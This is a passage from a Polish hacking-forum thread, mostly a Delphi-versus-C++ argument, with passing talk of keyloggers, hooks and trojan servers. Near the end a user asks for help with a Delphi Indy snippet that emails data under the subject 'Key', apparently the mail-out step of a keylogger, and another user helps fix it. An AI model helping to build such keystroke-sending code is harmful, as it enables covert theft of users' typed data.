Strona 3 z 4 PierwszyPierwszy 1234 OstatniOstatni
Pokaż wyniki od 31 do 45 z 57
    Użytkownik Avatar Damn3d

Domyślnie

To Delphi już sie nudne robi. Nie potraficie się zabrać za nic innego ? ;o
    Dobrze jest wstawić komponent idAntiFreeze aby program nie zatrzymywał się w momencie wysyłania poczty[/b]
    ROTFL. Nie ma jeszcze w Delphi TKeyLogger?

Użytkownik Avatar kanar123

Domyślnie

Wiesz jak nie masz pojęcia o tym co mówisz to się nie wypowiadaj...
    Jest komponent Keyspy i różnego rodzaju hooki... ale już tyle razy było to skanowane i trafiało do archiwum że nie ma sensu już tego używać... heh
    Sam jesteś nudny... Masz coś do Delphi ? XD

Dawni Moderatorzy

Domyślnie

Troche ma racji. Ostatnio nic innowacyjnego się nie pojawia. Większość rzeczy bazowana na gotowcach lub jakiś tutorialach.

Użytkownik (R) Avatar djmentos

Domyślnie

I bardzo dobrze. Mniej syfu po sieci krąży. A wiecie czemu tak jest? Bo komponenty od GG zaczęły szwankować i od razu mniej wszystkiego. Ciekawe zjawisto, nie?

Dawni Moderatorzy Avatar widmo17

Domyślnie

Ciekawe zjawisto, nie?[/b]
    To tylko dziwny zbieg okoliczności, wszystkiemu winny jest efekt cieplarniany i migracje pingwinów na antarktydzie

HOMEPAGE - http://widmo.soa1.org - programowanie, security, serwery.

Użytkownik (R) Avatar djmentos

Domyślnie

A ja myślałem że nadmierne promieniowanie kart kredytowych

Użytkownik Avatar Damn3d

Domyślnie

Wiesz jak nie masz pojęcia o tym co mówisz to się nie wypowiadaj...[/b]
    Fakt, jakoś mnie nie bawi rzucanie komponentów na formę (;
    Jest komponent Keyspy i różnego rodzaju hooki... ale już tyle razy było to skanowane i trafiało do archiwum że nie ma sensu już tego używać... heh[/b]
    Fajnie.
    Sam jesteś nudny... Masz coś do Delphi ? XD tongue.gif[/b]
    Taa. Delphi przypomina klocki LEGO, nie musisz nic potrafić, aby coś zbudować (Tyle, że wątpliwej jakości).
    Większość osób "programujących" (bo tak mądrze w brzmi) nic nie potrafią zrobić bez tych śmiesznych komponentów i nawet nie wiedzą jak one działają.
    (idAntiFreeze jest tego świetnym przykładem).

Przy okazji, sprawdź znaczenie słowa "ironia". (Komponentem TWikipedia np. ;P).

Użytkownik

Domyślnie

Nie wiem co wy bezmuzgi macie do Delphi...
    Delphi to dobre środowisko... Umiejętny programista potrafi wyczyniać cuda z takim środowiskiem...

W C++ składnia jest mało czytelna... W związku z czym większość programistów gubi się w tym co napisała... Albo też napisanie programu zajmuje o wiele więcej czasu niż w Delphi...

BC++ (bo taki skrót ma Borland C++ Buildier) - też ma obsługę "klocków"... I działa bardzo dobrze...
    Od tych "klocków" byście mogli się w końcu odp*****lić...
    Delphi jest bardziej opłacalne... Szybko idzie na tym zarobić...
    Delphi można "nauczyć" się w przeciągu roku... I pisać nawet gry, a co do C++ to nie jestem pewnien...

Naukę zaczołem 4 lata temu (w 1 kl gim)... Przez ten cały czas próbowałem niejednokrotnie oswoić się z C++... Nawet zaczynałem od C++... Ale nic. To jest język dla ludzi chaotycznych... Rok później zaczołem z Delphi, sporo umiem... I od zaj***nia już na tym zarobiłem... C++ próbuję dalej przyswoić sobie... Każda kolejna próba jest męczarnią... A programuję z pasją...

Ale dalsze rozprawki na ten temat - snujcie sobie sami...

Pozdrawiam. I mam nadzieje ze pare ludzi mniej przestanie tak uporczywie szukać "haków" na Delphi...

Moderator

Domyślnie

@I3L4D3

No widzisz a w czym pisałeś swoje aplikacje w C++? Jak w Devie to ściągnij Turbo Pascala i pokaż te swoje możliwości języka, Dev o ile wiem nie jest obecnie wspierany.
    Widziałeś na oczy środowisko Visual Studio albo Builder C++?
    Według mnie C++ jest bardzo czytelne, trzeba tylko mieć jakiś filar by rozumieć kod. Niestety program się za nas nie napisze na co liczy większość.
    Z CPP łatwiej uderzać do większości języków i jest bardziej przenośne. Wiem że są takie projekty jak Lazarus czy nie wspierany Kylix ale to nie to samo.

Dawni Moderatorzy

Domyślnie

<div class='quotetop'>CYTAT(I3L4D3 @ 9.07.2009, 1:26) <{POST_SNAPBACK}></div>
    wy bezmuzgi[/b]
    my bezmózgi

<div class='quotetop'>CYTAT(I3L4D3 @ 9.07.2009, 1:26) <{POST_SNAPBACK}></div>
    Umiejętny programista potrafi wyczyniać cuda z takim środowiskiem...[/b]
    Ciekawe co takiego nadzywczajnego można tam wyczyniać. Nadzwyczajne rzeczy to można wyczyniać, ale w Asm

Najpierw mówisz, że C++ jest nieczytelne i chaotyczne, a potem piszesz, że Borland C++ Builder jest bardzo dobry. To nie wiem czy Ty lubisz Delphi (Object Pascal) jako jezyk programowania czy lubisz za to, że możesz sobie tam ukladać programy z klockow. I czego Cię nauczyło to Delphi? Układać komponenty?

Rozumiem, wizualny edytor, bardzo ułatwia i przyśpiesza tworzenie programów, ale nie można przesadzać z używaniem tego. Pierwsza rzecz, że Delphi mało się nadaje do tworzenia malware. Druga rzecz to porażką jest jak niektórzy piszą serwer trojana z formularzem (który potem ukrywają, lol) i komponentami.

Użytkownik Avatar Damn3d

Domyślnie

Nie wiem co wy bezmuzgi macie do Delphi...[/b]
    No comment.

W C++ składnia jest mało czytelna... W związku z czym większość programistów gubi się w tym co napisała...[/b]
    Jakoś w tym języku tworzone są największe projekty i nikt nie narzeka.

Albo też napisanie programu zajmuje o wiele więcej czasu niż w Delphi...[/b]
    Co z tego, jak jakość jest kiepska?

Od tych "klocków" byście mogli się w końcu odp*****lić...[/b]
    Inteligentny argument.
    Delphi jest bardziej opłacalne... Szybko idzie na tym zarobić...[/b]
    Niby gdzie? Nie wiem która firma chciałaby kiepskiej jakości programy budowane na samych gotowcach (Owszem, w Delphi da się zbudować profesjonalne programy. Ale mało kto to robi).

Delphi można "nauczyć" się w przeciągu roku... I pisać nawet gry, a co do C++ to nie jestem pewnien...[/b]
    Widziałeś jakąś profesjonalną gre w Delphi ? 95% gier jest pisana w C++. Zresztą SDK do DirectX&#39;a (jak i każdej popularnej biblioteki graficznej) jest oryginalnie w C.

Naukę zaczołem 4 lata temu (w 1 kl gim)... Przez ten cały czas próbowałem niejednokrotnie oswoić się z C++... Nawet zaczynałem od C++... Ale nic. To jest język dla ludzi chaotycznych...[/b]
    ROTFL, że sam sie nie potrafisz nauczyć, to znaczy, że język jest kiepski ?
    Rok później zaczołem z Delphi, sporo umiem... I od zaj***nia już na tym zarobiłem... C++ próbuję dalej przyswoić sobie... Każda kolejna próba jest męczarnią... A programuję z pasją...[/b]
    Chyba czas zacząć myśleć z pasją.

Delphi jako język ma takie same możliwości jak CPP, ale:

- Jest jeden jedyny sprawny kompilator upadającej już firmy
    - Nie ma *sprawnych* kompilatorów na inne systemy
    - Żadne poważne projekty/biblioteki nie są napisane w tym języku
    - Programy zazwyczaj są niskiej jakości z powodu używania kiepskich komponentów wszędzie, gdzie sie da
    - Delphi utrudnia przyswajanie normalnych języków przez np. nie odróżnianie wielkości liter

EDIT:
    Btw. To nie temat o Delphi/CPP.

Domyślnie

Nie ma sprawnych kompilatorów, no tu akurat się nie zgodzę, poczytaj o FPC. Załatwia on też sprawę "innych systemów. Fakt jest taki, że możemy do niego dorzucić Lazarusa i mamy klona Delphi, tyle że wieloplatformowego. Osobiście preferuję oba języki (C++ i Object Pascal) a to którego użyję zależy głównie od tego co tworzę, jeśli chcę coś szybko naskrobać i w taki sposób, żeby nie było to kolejnym skryptem w Bashu czy Pythonie używam Pascala, bardziej zaawansowane projekty tworzę w C++, wymagające malutkie programiki w ASMie. To nie jest tak że jakiś język jest lepszy a inny gorszy, po prostu każdy ma inne przeznaczenie. A Pascal jest po prostu banalny i dlatego jeszcze istnieje, jest tym czym kiedyś był BASIC. Dziękuję, proponuję skończyć offtop.

Użytkownik Avatar Damn3d

Domyślnie

Nie ma sprawnych kompilatorów, no tu akurat się nie zgodzę, poczytaj o FPC.[/b]
    Nie uważam go za sprawny.
    Załatwia on też sprawę "innych systemów.[/b]
    Inne systemy to nie tylko Unixy.
    Fakt jest taki, że możemy do niego dorzucić Lazarusa i mamy klona Delphi, tyle że wieloplatformowego.[/b]
    Nie, implementacja VCLa nie jest kompatybilna, do tego prosty plik wynikowy na Windowsie (puste okienko) z LCL&#39;em ważył 13 MB.

Domyślnie

Ja mam problem z tym kodem:
    Kod:
    Procedure CostamCostam(Sender : TObject);

Begin
    MessageSend.Body.Append(&#39;TMemo.Text&#39;; // wprowadzasz treść jako TMemo.Text

MessageSend.From.Name := &#39;Przemo&#39;; //od kogo
    MessageSend.From.Address := &#39;[email protected]&#39;; //podajesz adres e-mail nadawcy
    MessageSend.Recipients.EMailAddresses := &#39;[email protected]&#39;; //adres e-mail odbiorcy
    MessageSend.Subject := &#39;Key&#39;; //temat listu

{ UserName bądź UserId - to jest zeleżne od wersji Indy.}

SMTP.UserName := &#39;[email protected]&#39;;
    SMTP.Password := &#39;*****&#39;;
    SMTP.Host := &#39;smtp.poczta.onet.pl&#39;;
    SMTP.AuthenticationType:=atLogin; // autoryzacja SMTP
    SMTP.Connect;
    try
    SMTP.Send(MessageSend); //wyślij
    finally
    SMTP.Disconnect; //jeśli zakończy to rozłącz z serwerem
    end;
    end;
    A takie sa bledy:
    ZDJECIE

Użytkownik

Domyślnie

<div class='quotetop'>CYTAT(myslaf @ 12.07.2009, 23:13) <{POST_SNAPBACK}></div>
    Ja mam problem z tym kodem:
    Kod:
    Procedure CostamCostam(Sender : TObject);

Begin
    MessageSend.Body.Append(&#39;TMemo.Text&#39;; // wprowadzasz treść jako TMemo.Text

MessageSend.From.Name := &#39;Przemo&#39;; //od kogo
    MessageSend.From.Address := &#39;[email protected]&#39;; //podajesz adres e-mail nadawcy
    MessageSend.Recipients.EMailAddresses := &#39;[email protected]&#39;; //adres e-mail odbiorcy
    MessageSend.Subject := &#39;Key&#39;; //temat listu

{ UserName bądź UserId - to jest zeleżne od wersji Indy.}

SMTP.UserName := &#39;[email protected]&#39;;
    SMTP.Password := &#39;*****&#39;;
    SMTP.Host := &#39;smtp.poczta.onet.pl&#39;;
    SMTP.AuthenticationType:=atLogin; // autoryzacja SMTP
    SMTP.Connect;
    try
    SMTP.Send(MessageSend); //wyślij
    finally
    SMTP.Disconnect; //jeśli zakończy to rozłącz z serwerem
    end;
    end;
    A takie sa bledy:
    ZDJECIE[/b]

Musisz odpowiednio ponazywać komponenty...
    Komponent TIdSMTP nazwij jako SMTP.
    A komponent TIdMessage nazwij jako MessageSend.

Pokaż resztę kodu... Pewnie zapominasz o średniku [;] na końcu każdej linijki.
    Średnika nie daje się po begin, try oraz finally...